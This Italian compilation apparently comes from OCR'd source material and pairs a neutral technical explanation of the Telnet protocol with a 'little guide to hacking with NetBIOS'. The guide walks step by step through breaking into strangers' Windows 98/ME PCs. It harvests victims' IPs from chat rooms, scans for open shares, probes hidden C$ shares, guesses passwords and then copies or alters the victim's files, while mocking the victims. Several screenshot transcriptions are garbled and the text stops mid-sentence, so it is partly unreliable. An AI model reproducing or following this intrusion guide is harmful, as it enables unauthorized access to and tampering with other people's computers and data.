Non sono ovviamente tutte... Ma ne avete a bizzeffe qui! 


Protocolli di login remoto: TELNET 


Generalità 


Telnet è un'applicazione standard dell'Internet ed è disponibile nella 
maggior parte delle implementazioni del TCP/IP, indipendentemente 

dal sistema operativo host. Si tratta di un semplice protocollo di login 
remoto, implementato secondo un modello di tipo client-server, che 
permette ad un utente attestato ad una certa macchina di stabilire una 
connessione TCP con un server di login che si trova su un'altra macchina. 
Subito dopo Telnet rilancia i caratteri battuti sulla tastiera dell'utente 
direttamente al calcolatore remoto come se essi fossero battuti su una 
tastiera direttamente connessa ad esso. Inoltre Telnet ritorna l'output della 
macchina remota indietro fino allo schermo dell'utente. Il servizio è definito 
trasparente perchè dà l'apparenza che la tastiera e lo schermo dell'utente 
siano attaccati direttamente alla macchina remota. 

Sebbene Telnet non sia molto sofisticato se paragonato ad altri protocolli di 
terminale remoto, esso risulta tuttavia largamente diffuso. Di solito, il codice 
client di Telnet permette all'utente di specificare la macchina remota a cui ci 
si vuole connettere dando il suo nome di dominio oppure il suo indirizzo IP. 


Telnet offre tre servizi di base. Per prima cosa, definisce un network virtual 
terminal (terminale virtuale di rete) che fornisce una interfaccia standard 
verso i sistemi remoti. Il programma client non può essere istruito sui dettagli 
di tutti i possibili sistemi remoti, così esso è realizzato per usare l'interfaccia 
standard. In secondo luogo, Telnet include un meccanismo che permette ai 
due moduli client e server di negoziare delle opzioni, e fornisce un insieme di 
opzioni standard (ad esempio, una delle opzioni controlla se i dati trasmessi 
attraverso la connessione debbano essere rappresentati mediante il set 
standard di caratteri ASCII a 7 bit oppure mediante un set di caratteri ad 8 
bit). Infine, Telnet tratta simmetricamente entrambi gli estremi della 
connessione. In particolare, Telnet non obbliga che l'input del client provenga 
da una tastiera, e nemmeno che l'output di tale client sia costituito per forza 
da uno schermo. In questa maniera, Telnet permette ad un qualsiasi 
programma di diventare utente del client. Inoltre, entrambe le parti possono 
negoziare le opzioni. 


La seguente figura illustra come dei programmi applicativi implementano un 
client e server di Telnet: 


Quando un utente invoca Telnet, un determinato programma applicativo sulla 
macchina dell'utente diviene il client. Esso stabilisce una connessione TCP 
con il server, tramite la quale comunica con questo. Una volta stabilita la 
connessione, il client legge i caratteri battuti sulla tastiera dell'utente e li 
trasmette al server, e nel frattempo legge i caratteri che il server gli ritorna 
indietro per visualizzarli sullo schermo dell'utente. Il server deve accettare la 
richiesta di connessione dal client, dopodichè deve rilanciare i dati ricevuti 
tramite questa connessione al sistema operativo della macchina su cui si 
trova. 


Nella pratica, il server è più complesso di quanto mostrato in figura, poichè 
esso deve gestire connessioni multiple concorrenti. Di solito, un processo 
padre aspetta su una determinata porta una richiesta di connessione e, 
quando questa arriva, crea un processo figlio che gestisce tale connessione. 
Perciò, il server Telnet mostrato in figura rappresenta il processo figlio che 
gestisce una particolare connessione. La figura dunque non mostra il 
processo padre che ascolta sul socket in attesa di nuove richieste, nè mostra 
altri processi figli che concorrenzialmente gestiscono ulteriori connessioni. 


Si adopera il termine pseudoterminale per descrivere il punto di ingresso 
(entry point) del sistema operativo che permette ad un programma quale il 
server Telnet di immettere caratteri nel sistema operativo della macchina 
remota facendo credere a quest'ultimo che essi provengano da una tastiera. 
Sarebbe impossibile realizzare un server Telnet senza che il sistema 

operativo fornisca una tale possibilità. Se il sistema supporta un dispositivo di 
pseudoterminale, il server Telnet può essere implementato mediante 
programmi applicativi. Nel server, ogni processo figlio funge da 
collegamento tra il flusso di dati provenienti dalla connessione TCP ed un 
particolare dispositivo di pseudoterminale. 


Fare in modo che il server Telnet sia un programma a livello applicativo 
comporta sia vantaggi che svantaggi. Il vantaggio più ovvio è che risulta più 
semplice la modifica ed il controllo del server rispetto al caso in cui il codice 
sia contenuto nel sistema operativo. Lo svantaggio è chiaramente 
l'inefficienza, poichè ciascun carattere deve viaggiare dalla tastiera d'utente, 
attraverso il sistema operativo, fino al programma client, dal programma 
client tornare al sistema operativo e, attraverso la connessione di rete, 
arrivare alla macchina remota. Qui, i dati devono arrivare, attraverso il 
sistema operativo, fino al programma applicativo server, e da quest'ultimo di 
nuovo indietro al sistema operativo in un dispositivo di pseudoterminale. Alla 
fine, il sistema operativo remoto invia il carattere al programma applicativo 
che l'utente sta facendo correre. Si capisce che, nel frattempo, l'output 
(compresi i caratteri di echo se tale opzione è stata selezionata) viaggia a 
ritroso dal server al client lungo lo stesso percorso. 


Adattamento delle eterogeneità 


Affinchè Telnet possa interoperare tra il maggior numero possibile di sistemi, 
è necessario adattare le particolarità di calcolatori e sistemi operativi 
eterogenei. Per esempio, alcuni sistemi prevedono che le linee di testo siano 
chiuse dal carattere ASCII carriage control (CR). Altri richiedono il 
carattere linefeed (LF). Altri ancora richiedono la sequenza dei due 
caratteri CR-LF. Inoltre, la maggior parte dei sistemi interattivi fornisce 
all'utente il modo di immettere una chiave che interrompe un processo in 
esecuzione, ma il particolare carattere usato per tale scopo varia da sistema 
a sistema (alcuni usano Control-C, mentre altri adoperano Escape). 

Per adattare le eterogeneità, Telnet definisce il modo in cui i dati e le 
sequenze di comando devono essere trasmesse attraverso la rete. La 
definizione è nota come network virtual terminal (NVT). 


Come illustrato dalla figura sopra, il codice client traduce i caratteri e le 
sequenze di comando dal formato del terminale d'utente al formato NVT e li 
trasmette al server. Il codice server traduce i dati e i comandi ricevuti dal 
formato NVT al formato richiesto dal sistema remoto (quello in cui il server 
si trova). Per il percorso inverso, il server traduce dal formato della 
macchina remota al formato NVT, mentre il client traduce dal formato NVT 
a quello della macchina locale. 

La definizione del formato NVT è estremamente precisa. Ogni 
comunicazione coinvolge unità informative (byte) ciascuna formata da 8 bit. 
All'avvio, per default, NVT adopera la rappresentazione standard USASCII 
a 7 bit per i dati e riserva per le sequenze di comando i byte col bit di ordine 
massimo settato ad 1. Il set di caratteri USASCII include 95 caratteri 
stampabili e 33 caratteri di controllo. 


Passaggio di comandi per controllare la parte remota 


Abbiamo già accennato al fatto che molti sistemi forniscono un meccanismo 
che permette agli utenti di terminare un programma in esecuzione. Di solito, 
il sistema operativo accoppia tale meccanismo ad un particolare tasto o 
sequenza di caratteri. Ad esempio, a meno che l'utente non specifichi 
diversamente, molti sistemi Unix riservano al carattere generato dalla 
sequenza Control-C la funzione di interruzione. Digitando Control-C si 
costringe Unix a terminare il programma in esecuzione; il programma non 
riceve Control-C come input. Il sistema inoltre può riservare altri caratteri o 
sequenze di caratteri per altre funzioni di controllo. 

NVT di Telnet adatta le funzioni di controllo definendo come esse devono 
essere passate dal client al server. Dal punto di vista concettuale, si 
immagina che NVT possa accettare immissioni di caratteri da una tastiera in 
grado di generare più dei 128 possibili caratteri. Si suppone cioè che la 
tastiera dell'utente abbia tasti virtuali (immaginari) che corrispondono alle 
funzioni tipicamente usate per controllare i processi. Ad esempio, NVT 
definisce un tasto concettuale di "interruzione" ("interrupt") che serve a 
richiedere la terminazione di un programma. 

Nella pratica, la maggior parte delle tastiere non fornisce tasti in più per i 
comandi. Tuttavia, certi sistemi operativi o interpreti di comandi presentano 
una varietà di modi per generarli. Abbiamo già menzionato la tecnica più 
comune: accoppiare un determinato carattere ASCII ad una funzione di 
controllo cosicchè, quando l'utente preme il tasto, il sistema operativo 
effettua l'azione appropriata invece di accettare il carattere come input. I 
progettisti dell'NVT hanno scelto di tenere separati i comandi dal normale 
set di caratteri ASCII per due ragioni. Per prima cosa, definire 
separatamente le funzioni di controllo significa conferire a Telnet una 
maggiore flessibilità. Esso può infatti trasferire tutte le possibili sequenze di 
caratteri ASCII tra il client ed il server così come tutte le possibili funzioni di 
controllo. Inoltre, tenendo separati i segnali dai normali dati, NVT permette 
al client di specificare i segnali senza ambiguità, ovvero senza confusione 
circa il fatto se il carattere immesso debba essere trattato come dato o come 
funzione di controllo. 


Per mandare le funzioni di controllo attraverso la connessione TCP, Telnet le 


codifica adoperando una cosiddetta sequenza di escape. Una sequenza di 
escape usa un ottetto riservato per indicare che è in arrivo un ottetto in cui è 
codificato un comando. In Telnet, l'ottetto riservato che apre una sequenza 
di escape è noto come l'ottetto interpret as command (IAC). 

I segnali generati dai tasti concettuali di una tastiera NVT corrispondono 
ciascuno ad un comando. Ad esempio, per richiedere che il server 
interrompa il programma in esecuzione, il client deve inviare la sequenza di 
due ottetti IAC IP (255 seguito da 244). Comandi addizionali permettono al 
client ed al server di negoziare il set di opzioni da usare e di sincronizzare la 
comunicazione. 


Facciamo notare che la codifica NVT di tutti i caratteri stampabili e di 
controllo, qualora sia in vigore il comportamento di default, coincide con la 
codifica standard ASCII a 7 bit, la quale comporta una corrispondenza di tali 
caratteri con i primi 128 numeri naturali (da 0 a 127), e conseguentemente il 
valore nullo del bit pesante nell'ottetto che rappresenta il dato. Poichè la 
codifica NVT delle funzioni di controllo prevede l'impiego di ottetti ai quali, 
secondo la rappresentazione binaria, corrispondono numeri naturali maggiori 
di 128, cioè col bit pesante settato ad 1, si evince che non può esservi 
confusione tra alcun dato e qualsiasi ottetto di comando, in particolare 
l'ottetto IAC, formato interamente da bit unitari (codifica decimale 255). 
Tale confusione può però verificarsi qualora sia in vigore l'opzione cosiddetta 
di trasmissione binaria, la quale prevede l'uso di un set di caratteri ad 8 bit, 
cioè di ottetti in cui il bit pesante può essere settato ad 1 anche per la 
codifica di dati. In tal caso, è previsto che se deve essere trasmesso un dato 
(ovvero un carattere) tale che l'ottetto che lo codifica è uguale all'IAC, allora 
tale ottetto deve essere trasmesso due volte. 


Come si forza il server a leggere una funzione di controllo 


L'invio delle funzioni di controllo assieme ai normali dati non sempre è 
sufficiente per garantire il risultato desiderato. Per capire il perchè, 
consideriamo la situazione in cui un utente vuole mandare la funzione di 
controllo interrupt process al server. Di solito, un tale evento è necessario 
quando il programma in esecuzione sulla macchina remota sta funzionando 
male e l'utente vuole che il server termini il programma. Per esempio, il 
programma potrebbe star eseguendo un loop infinito senza leggere l'input o 
generare alcun output. Sfortunatamente, se l'applicazione sulla macchina 
remota smette di leggere l'input, i buffer del sistema operativo si riempiono 
ed il server non potrà più scrivere dati sullo pseudoterminale. Quando ciò 
accade, è previsto che il server smetta di leggere i dati che provengono dalla 
connessione TCP, i cui buffer di conseguenza si riempiono. In una 
circostanza del genere, l'entità TCP sulla macchina del server notifica la 
situazione all'entità paritaria sulla macchina locale informandola circa la 
dimensione nulla della finestra di flusso, ed in seguito a tale notifica si 
interrompe il flusso di dati lungo la connessione. 

Se l'utente genera una funzione di controllo di interruzione nel momento in 
cui i buffer sono pieni, la funzione di controllo non raggiungerà mai il server. 
Ovvero, il client può senz'altro generare la sequenza di comando IAC IP e 
scriverla sul proprio socket, ma poichè l'entità TCP ha interrotto la 
trasmissione verso l'entità paritaria remota, il server non potrà leggere la 


suddetta sequenza di controllo. 

Per risolvere il problema, Telnet adopera un segnale cosiddetto fuori-banda 
(out of band signaling). Il TCP implementa la segnalazione fuori banda col 
meccanismo di urgent data. Ogniqualvolta deve inserire una funzione di 
controllo all'interno del flusso di dati, il modulo client di Telnet genera un 
comando di SYNCH, costituito dalla sequenza "IAC (segnale utente) IAC 
DMARK" (per esempio, se l'utente ha generato il segnale di interrupt 
process premendo la combinazione Control-C sulla propria tastiera, il 
comando di SYNCH sarà formato dalla sequenza "IAC IP IAC DMARK"). 
Tale sequenza viene passata all'entità TCP sottostante contemporaneamente 
ad un'apposita segnalazione che forza la stessa entità TCP a trasmettere un 
segmento (col bit di URGENT DATA settato ad 1) che elude il controllo di 
flusso e giunge immediatamente all'entità TCP remota. Questa, ricevendo un 
così fatto segmento, segnala al modulo server di Telnet che sono arrivati dati 
con la massima priorità, ed è previsto che il server, in virtù di una tale 
segnalazione, scarichi dal buffer della connessione TCP tutti i dati che trova, 
continuando però ad interpretare i comandi. Di conseguenza il server, 
durante tale operazione, è destinato ad incontrare dapprima la sequenza di 
comando "IAC (segnale utente)", dalla quale capisce cosa l'utente vuole che 
faccia, e subito dopo la sequenza di comando "IAC DMARK", che ha il 
significato "torna al normale modo di processamento" 


Opzioni di Telnet 


Finora abbiamo omesso la descrizione di uno degli aspetti più complessi di 
Telnet: le opzioni. In Telnet, le opzioni sono negoziabili, e rendono possibile a 
client e server riconfigurare la loro connessione. Ad esempio, abbiamo già 
detto che di solito il flusso di dati è a 7 bit e gli ottetti col bit pesante settato 
ad 1 sono usati per passare informazioni di controllo come il comando di 
interrupt process. Comunque, Telnet fornisce anche un'opzione che 

permette a client e server di scambiarsi dati ad 8 bit (quando questo 

succede, l'ottetto riservato IAC deve essere raddoppiato se appare come 
dato). Client e server hanno bisogno di una fase di negoziazione, ed entrambi 
devono accettare il passaggio di dati ad 8 bit prima che un tale tipo di 
comunicazione sia possibile. 


L'area delle funzionalità delle opzioni Telnet è vasta: alcune estendono le 
importanti. Per esempio, il protocollo originale fu progettato per un ambiente 
half-duplex in cui era necessario dire all'altra parte di "andare avanti" (go 
ahead) prima che essa potesse trasmettere altri dati. Una delle opzioni 
controlla se Telnet opera in modo half-duplex o full-duplex. Un'altra opzione 
permette al server sulla macchina remota di determinare il tipo di terminale 
d'utente. Il tipo di terminale è importante per il software che genera le 
sequenze di posizionamento del cursore (ad esempio un editor a tutto 
schermo in esecuzione sulla macchina remota). 


La maniera in cui Telnet negozia le opzioni risulta interessante. Siccome 
talvolta ha senso anche per il server iniziare l'esecuzione di una particolare 
opzione, il protocollo prevede di permettere ad entrambe le parti di effettuare 
una richiesta. In tal maniera, si dice che il protocollo è simmetrico per 


quanto riguarda il processamento delle opzioni. Entrambe le parti inoltre 
rispondono ad una richiesta con un'accettazione o un rifiuto. Nella 
terminologia Telnet, la richiesta è WILL X, che significa permettimi di usare 
l'opzione X; e la risposta può essere sia DO X che DON'T X, ovvero 
rispettivamente ti permetto di usare l'opzione X e non ti permetto di 

usare l'opzione X. La simmetria consiste nel fatto che DO X richiede che il 
ricevente cominci ad usare l'opzione X, mentre WILL X o WON'T X significa 
voglio cominciare ad usare l'opzione X o non voglio cominciare ad 

usarla. 


Un altro interessante aspetto della negoziazione consiste nel fatto che 
entrambi i moduli Telnet devono essere in grado di eseguire una 
implementazione base di NVT (cioè senza alcuna opzione in vigore). Se una 
delle due parti tenta di negoziare un'opzione che l'altra non capisce, la parte 
che riceve la richiesta si limita semplicemente a declinare l'invito. In questa 
maniera, è possibile fare interagire versioni di moduli Telnet più recenti e 
sofisticate (cioè software che comprende più opzioni) con versioni meno 
sofisticate. Se sia il client che il server capiscono le nuove opzioni, essi 
potranno incrementare la qualità dell'interazione, altrimenti faranno 
riferimento ad uno stile meno efficiente ma comunque funzionante. 


PICCOLA GUIDA ALL' HACKING CON NETBIOS 


NETBIOS: questo sconosciuto. 


Ho deciso di scrivere questa piccola guida dopo avere fatto alcune ricerche, rendendomi conto che in molti non 
sanno che cosa sia, e che quelli che lo sanno rilasciano poche informazioni e sopra tutto sempre molto 
confuse ed imprecise. 

Premetto che quello che troverete scritto qua, è stato sperimentato su WIN 98 e WIN ME, quindi se avete 
qualche altro O.S. Microsoft forse dovrete adattarvi. 


Questa guida è il frutto di svariate prove e ricerche compiute dall'amico NEWFOLDER, egli è stato la mente 
che ha elaborato le nozioni trovate in giro per la rete e le ha finalmente tradotte in qualcosa di tangibile. 

lo da parte mia ho solo raccolto le varie notizie che lui mi passava, l' ho aiutato in svariate prove, gli ho dato 
qualche consiglio e suggerimento ed ora mi accingo nell' impresa di mettere quasi tutto quello che so insieme. 


A titolo informativo vi dico che : 

NETBIOS è l'acronimo di: Network Basic Input/Output System. 

Lavora sfruttando la comunicazione tramite la porta 139. Non è altro che un “tool” di Windows che serve a 
mettere in grado due o più pc di comunicare tra di loro e costituisce quindi il cuore delle reti LAN. 
Originariamente queste reti erano di tipo NetBEUI e sfruttavano NETBIOS tramite l'ausilio dell' LMHOST. 
L'LIMHOST è un programmino che funziona come un piccolo server DNS e permette di associare gli indirizzi IP 
ai nomi NETBIOS (HOST appunto, ma non solo). Le funzioni del LUHOST sono comunque molteplici e non 
riguardano solo NETBIOS. 

In pratica all'interno di una rete LAN, se avevo bisogno di rintracciare un pc, non dovevo fare altro che scrivere il 
nome dello stesso e tramite LMHOST se era connesso mi avrebbe risposto. 

Ora purtroppo a causa della presenza dei ROUTER, in internet questo tipo di chiamata non viene inoltrata. 
Resta sempre la possibilità di sfruttare in qualche modo LMHOST, ma dato il punto debole causato dai 
ROUTER e dal fatto che mi sono accorto che non è stato integrato nel TCP/IP di WIN ME, non mi dilungo nel 
spiegarvi cose che poi potrebbero rivelarsi inutili. 


Ogni rete aziendale o non che abbia computer connessi tra di loro anche tramite l'apposita scheda ethernet, e 
che sfrutti le reti microsoft deve utilizzare NETBIOS per far si che i file posti dentro ad un pc siano accessibili 
da un altro computer della stessa rete e viceversa. 

Noi non faremo altro che sfruttare la stessa cosa ma tramite il nostro piccolo e lento modem. 

Naturalmente perché questa caratteristica sia sfruttabile oltre a NETBIOS serve anche che l'unità, la cartella, il 
semplice file sia condiviso. Cioè l'utente sfigato ha settato il suo computer in modo da rendere disponibile agli 
altri pc queste risorse. Mi pare ovvio, ma lo scrivo lo stesso, che il pc dell'utente “coglione” deve essere 
connesso in internet. 


Forse non sono stato chiaro, ma comunque quello che ci interessa è il fatto che grazie a questa peculiarità di 
Winzozzone possiamo andare a spiare e non solo nei computer altrui. Il tutto standocene comodamente seduti 
a casa davanti alla nostra console. 


Voglio fare una piccola premessa: questa funzionalità di Windows è integrata nel sistema operativo e non è 
assolutamente un bug come alcuni in giro per internet lo hanno definito. Lo stesso problema lo hanno i 
computer con Linux, nemmeno il famigerato e poco utilizzato “pinguino” è immune da questo tipo di intrusioni. 
Naturalmente se adoperate WIN non potrete mai entrare in un pc con linux, ma questo solo perché il vostro 
sistema non riconoscerà mai il file system (formato) del disco condiviso da linux. 


Cosa bisogna fare allora per venire in possesso di questa terribile arma e sfruttarla a nostro “piacere”? 

Prima di tutto dobbiamo NETBIOSSARE il nostro pc. Come!!!??? Direte voi, per entrare nei pc degli altri devo 
fare in maniera che anche gli altri possano entrare nel mio??? 

E' proprio cosi, però sapendo quello che in seguito vi spiegherò baderemo bene a non condividere risorse 
quando siamo connessi ad interneto almeno ad inserire una banalissima password, ed almeno cosi non 
saremo noi a fare la parte dei “coglioni” di turno. 


Per NETBIOSSARE il nostro pc procediamo come segue, la finestra che vedete sotto è la finestra dei settaggi 


della configurazione della rete del mio Win ME, sarà del tutto simile a quella di Win 98 ed in questa fase è 
quella che vedrete di più. 
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Fare: Start/Impostazioni/Pannello di controllo /Rete/Aggiungi/Protocollo/Microsoft/protocollo compatibile 
IPX/SPX/OK 

Forse vi verrà chiesto di inserire il CD di Winzoz, dipende dal tipo di installazione che avete fatto. 

Poi: Start/Impostazioni/Pannello di controllo/rete/Aggiungi/Protocollo/Microsoft/Client per reti microsoft/OK 

Forse ha di nuovo bisogno del CD di Win. 

Dopo di che: Start/Impostazioni/Pannello di controllo/Rete/Condivisione di file e stampanti/OK 


Bisogna controllare di poter selezionare e deselezionare tutte le caselle, nel caso non fosse possibile provare a 
spegnere e riaccendere il computer. 


Ancora: Start/Impostazioni/Pannello di controllo/Rete/Protocollo IPX/SPX/Netbios/Attiva netbios su 
IPX/SPX/OK 


Di nuovo: Start/Impostazioni/Pannello di controllo/Rete/Client per reti microsoft/Connessione rapida/OK 


Ora fate di nuovo: Start/Pannello di controllo/Proprietà internet. 


Da Connessioni selezionate l'account che preferite, andate nelle Proprietà e dal Menu Rete/Protocolli di rete 
consentiti spuntate le caselle NetBEUI e Compatibile IPX/SPX e Accedi alla rete mentre TCP/IP dovrebbe 
essere gia spuntato. Nell'interfaccia di Win 98 trovate tutto nella stessa finestra, invece con ME dovete entrare 

nel Menu Protezione per spuntare la casella Accedi alla rete. 


A questo punto riavviare il sistema, connettersi ad internet con l'account che avete settato come descritto 
sopra (naturalmente potete settare tutte le connessioni che avete per essere usate con NETBIOS). 

Fare le seguenti prove: 

Aprire Start/Esegui. 


Si aprirà la finestra di “Configurazione IP”. 
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Ora segnatevi il numero scritto nella casella corrispondente a “Indirizzo”, quello è il vostro attuale numero IP 

assegnatovi dal server del provider. Tenete presente che il 99,99% delle IP sono del tipo dinamico, quindi 

cambiano ogni volta che un utente si connette ad internet. 

Detto questo, non sperate che se oggi beccate un pc netbiossato connesso ad internet, domani lo trovate 
ancora semplicemente connettendovi di nuovo alla stessa IP. 

Ciò è possibile solo se il tizio che state piratando ha un IP di tipo statico, che è un'esclusiva di aziende, organi 
statali e cose di questo genere. Quindi fate anche attenzione a chi cercate di forgiare il computer. 

OK!! Ora siete in possesso della vostra IP, aprite una sessione di DOS tramite il “Prompt di MS-DOS”. Digitate 
questo comando: nbtstat -A <vostra IP> e premete INVIO. 

Se tutto è stato settato bene vi dovrebbe comparire una videata di questo genere: 


C-WIHD®WS>nbistat -@ 151.20.155.287 


: [151.,20,155.,217] $cepo Id: [] 
Mat NTNS Mamate Machine Nara= Tahle 


Hane / Status 
MANTFIFA 0 C@M>  MINFONTO 
MOREGROUP c 6AOUP Registered 


DANIELE1 <93> UNIQUE Registered 
DANIELE1 <20> UNIQUE Re; is tere 
HANIRII Ì ENINII legi<ktanasd 
NOREGROUP n 6ROUP Registered 


MAR Aililresa - 46-h5-53-54-80-NM 


C - WINDOWS® 


Questo è l'elenco dei servizi offerti dal vostro pc, il primo nome della lista e il più importante(in questo caso 
“DANIELE1) è l'HOST NAME ovvero il nome del vostro computer. Questo può servire (se vi segnate gli HOST) 
per individuare con certezza o quasi uno specifico pc connesso in rete che ha l'Ip dinamica. 


Fate questa altra prova: andate in Risorse del computer, cliccate con il destro sopra una unità (A, C, D, etc.) e 
selezionate Condivisione. Vi si aprirà una finestra nella quale dovrete selezionare Condividi con nome, fate 

Applica e OK. Nella finestra Risorse del computer dovrebbe essere apparsa una manina in manica blu che 
regge l'unità che avete condiviso. Tornate al Prompt di MS-DOS e digitate: net view \\<vostra IP> + INVIO. 
quello che dovreste vedere dovrebbe essere molto simile alla immagine sotto. 


"| A [© Al 
Li MPINBIAIS> act vicw \\151.20,135.8 
Fisurse vundivize su “N151.29-135.0 
Condivisione Tipu Cunme nto 


Cc Discu 


Esecuzione ceortando Piuscitaà. 


C:\IND ASS _ 


L' importante ora è sapere che se vi è apparso ciò siete pronti per giocare con NETBIOS e magari 
farvi beccare dalle forze dell'ordine e prendervi una bella denuncia per “abuso di mezzi 
informatici”. ATTENZIONE A QUELLO CHE FATE!!! 


Di seguito vi sarà spiegato come entrare materialmente nei computer altrui. Leggere anche quella parte 
attentamente e tenere sempre a mente che anche io che sto scrivendo non ho mai finito di imparare. Ricordate 
di andare a togliere la condivisione all'unità che avete selezionato prima per fare la prova. 


COME HACKERARE CON NETBIOS: 


Prima di tutto bisogna scovare delle IP di computer in quel momento connessi ad internet. 

Ci sono molti modi, anche quello di provarle a caso eseguendo dal Prompt di MS-DOS il comando PING. 

Se volete fate una prova digitate dal Prompt il comando e la vostra IP. il tutto scritto come segue: 

ping xXx.XXX.XXX.XXxX + INVIO (non sto nemmeno li a mostrarvelo). 

Ma non mi pare che questo sia molto efficace, il comando PING tenetelo buono per quando volete la certezza 
che un pc che state provando a penetrare sia ancora connesso, oppure quando trovate uno di quei pc con la IP 
statica e volete sapere se in quel momento è in rete. 

Un buon sistema può essere quello di connettervi in chat con IRC o ICQ e tramite il comando di rilevazione 
delle DNS (presente nella maggior parte degli script di IRC e ICQ) trovare l' IP dei vari utenti connessi alla chat. 
A questo punto non dovrete fare altro che andarvi a cercare quale degli utenti ha il computer netbiossato 
adoperando i comandi descritti nelle pagine successive, che del resto sono gli stessi che avete usato per 
testare se il vostro pc è stato netbiossato con successo. 

Vi chiederete se esiste un sistema più veloce e che vi eviti di scrivere centinaia di IP magari senza tirarne fuori 

il classico ragno dal buco. 

SI!! ESISTE! Infatti vi sono dei programmi che fanno automaticamente la scansione in un range di IP da voi 
impostato e vi trovano quali sono i computer netbiossati e anche quali sono le risorse condivise. | programmi 
che conosco io sono il “Legion 2.1” e il “Netscan 1.2”. Di seguito potete osservarne le interfacce grafiche. Se 
siete in grado procurateveli, vi conviene. 
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Supponiamo abbiate trovato qualche IP che pare faccia al caso vostro, allora siete pronti a fare i pirati, 
mettetevi la benda sull'occhio e partite..................... 


Aprire una finestra di DOS (Prompt di MS-DOS) e scrivere: 

dove le x rappresentano il numero ip. 
In questo modo scoprirete se il pc è netbiossato e l'host del computer. Se il pc in questione è netbiossato vi 
apparirà qualcosa come nell'immagine sotto. Se l'host non vi interessa potete saltare questa parte. 


= [DI x 


ad SIE al | SH Al 


“\UTNDOWS>nbtstat -R 151.78.135.9 


ifLana hO: 
Nade lpfiddress: |151,70.153.235] Scope ld |] 


NetE1US Hemote Nachine Name lable 
Iype Status 
HH Registered 
CROUP Registered 
UNIQUE Registered 
<28>  UMIQUE Registered 
HONKCROUP » Gneur 1 


MAC fiddress = 44-45-53-54-00-89 


Negistered 
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Allo scopo di conoscere, se vi sono e quali sono le risorse condivise, dovete procedere sempre con il Prompt 
di MS-DOS scrivendo il comando: 


Vi appariranno se ci sono, l'elenco delle risorse condivise. A volte può succedere che il pc da voi interpellato 
sia netbiossato, ma invece di trovare le risorse vi compare un bel messaggio di errore. In questo caso può 
significare che non ci sono risorse condivise oppure le risorse sono nascoste, cioè rese invisibili. 


MS = = 
3 Prompi di M5-DOG 


f-MNUTINNNWS> net view SNIS1.27010.13 
Fisorse condimise su \X151.20.135. 


Candivisipne Tipo Bonnento 


Ri<en 

Bisco 

Bisco 

Bisco 
Esecuziune cumnandu riuscila. 


CI XNUINDOLIS>_ 


Nel caso siano invisibili di solito il messaggio di errore dice grosso modo che la risorsa fa parte di una unità 


condivisa ma che gli attributi che gli sono stati assegnati non ci consentono di utilizzarla. 


L'unica cosa da fare è provare ad aggiungere al momento di impostare la connessione il simbolo $ dopo il 
nome della risorsa che presumiamo esista. 


lo di solito provo sempre con C$. Se questo funziona, quasi sicuramente vi verrà richiesta una password. 


LASCIATE PERDERE. Se l'aggiunta del simbolo $ non funziona, LASCIATE PERDERE. 


Comunque se abbiamo trovato quali sono le risorse segnatevi su un banale foglietto di carta o dove cavolo 
volete l' IP della vostra vittima. 


A questo punto siamo pronti per penetrare nel computer specificato. 
Apriamo a questo scopo, cliccando con il tasto destro su “Start” e poi “Esplora” con il sinistro. 


Si aprirà cosi il “Menu di Avvio”, che a noi però non interessa direttamente. 


Apriamo dalla barra dei strumenti il menu “Strumenti” 
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e selezioniamo la voce “Connetti unità di rete”. 


Ci appare la finestra che ci chiede quale unità di rete vogliamo connettere e quale lettera di unità gli vogliamo 


assegnare. 
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La lettera di unità è a discrezione, se vi va bene lasciate quella che vi mostra lui (che è la prima lettera di unità 
libera) oppure scegliete quella che più vi piace. 


In “Percorso” scrivete il numero IP che vi siete segnati, e il nome della risorsail tutto con la sintassi 
appropriata che è: \\<n° IP>\<nome della risorsa> come potete vedere meglio nell'immagine precedente. 


Cliccate su “OK” ed attendete pazientemente qualche secondo, a questo punto il vostro sistema diventerà 
terribilmente lento e quindi dovete attendere senza la pretesa che tutto giri come un fulmine. Non cercate di 
forzare o anticipare nulla l'unico risultato sarà quello di incasinare Winzoz, e forse vi toccherà riavviare il pc. 


Può succedere (e non è per niente raro, non tutti sono rincoglioniti), che vi venga chiesta anche in questo caso 
la password per accedere alla risorsa a cui vi state connettendo. 

Ora o conoscete la password oppure fate qualche tentativo inserendo per esempio il nome Host del pc, se non 
funzionano l'unica è rinunciare, la porta è sbarrata. 


OK!! Non vi è stata chiesta la password! CHE BELLO!!! 
Siete connessi con il computer di un tizio che non conoscete e che non sa che voi siete li. 


x C in *151.20.135.0* (I1:] = = 19 
| Eco Herîfice “Mido  Prefe Seircnli 2 | 


| 'Indeic . È |M Th Leila “# Cierebae | DE x ui EB 


|bisnzo]3 r*F MIFIPI uri 
Us .ala x Ca Sa Ga ca CI aj 
[1] 1293 2j —- cit Li sal sé 
Da fi | (PF JULKII! irene cell sor cl ommmi hovemoi sirena] dranesio sd 
(4 55 EM 


TC SPSTFHES 


per GI, x an 

quos i #2 (n Co dt 
te-[ Ev* 

f-C4 enposz lar Pi Jet ali Loss Lontbiali  atibbsa. lens] 


RC Deal 32 


Ar sù "a © ai & 


0 EDI sn f&natni a "= n 
ver pra femore eri dee ee we Em ‘ 
eg i Litdt 3.) 
D UMMITCIFI 
ti TN v 1 L | RT 3 Lé 4 | fi ] 
+? IDNCH 1 LESS | 
PR ù +3 1H.J “EH YUII HEE LUMI PAL AHoh Aiuga n 
© 2] 34oorio colposi FIIF3 
DI minimi x a PENNA 
+ I asiusaerit a lazione ci | ER si Il [ RE EE ] Di 
È = PALA Ina? abot Pili van VAIaros 
+ J Ja sdinsl 
DO diva 
+} Ziccumen: A > nà 
+ Zicmmbazi # La {cai aj PI 
4 3 ttt gi olluybi SU VEZE,. SLIL:<EU 3LU LUG. BULI.JE... 


Beh, la soddisfazione di essere li dovrebbe essere gia più che sufficiente. 
A questo punto deve essere il vostro senso morale a darvi le dritte. 


Sappiate comunque che la condivisione può essere di sola lettura, in questo caso non potete fare altro che 
esplorare le varie cartelle o file e se proprio vi interessano copiatevele semplicemente usando i normali 
comandi di Winzoz (Copia/incolla; con il tasto destro selezionate e fate “Invia a ....”; con il Drag and Drop. Fate 
voi!!!). 


Se la condivisione è invece di Lettura/Scrittura il gioco può essere ancora più divertente, potete trasferire anche 
i vostri file all'interno della risorsa e delle cartelle che vi trovate dentro, oppure anche modificare i suoi. 
Qui potete sbizzarrire la vostra fantasia, ma tenete sempre presente che i cattivi vanno all'inferno 


Una cosa importante: se lanciate un file trovato all'interno del pc del malcapitato (che sia un semplice testo o 
un programma tipo un .exe) questo andrà in esecuzione sul vostro computer. Quindi fate attenzione a 
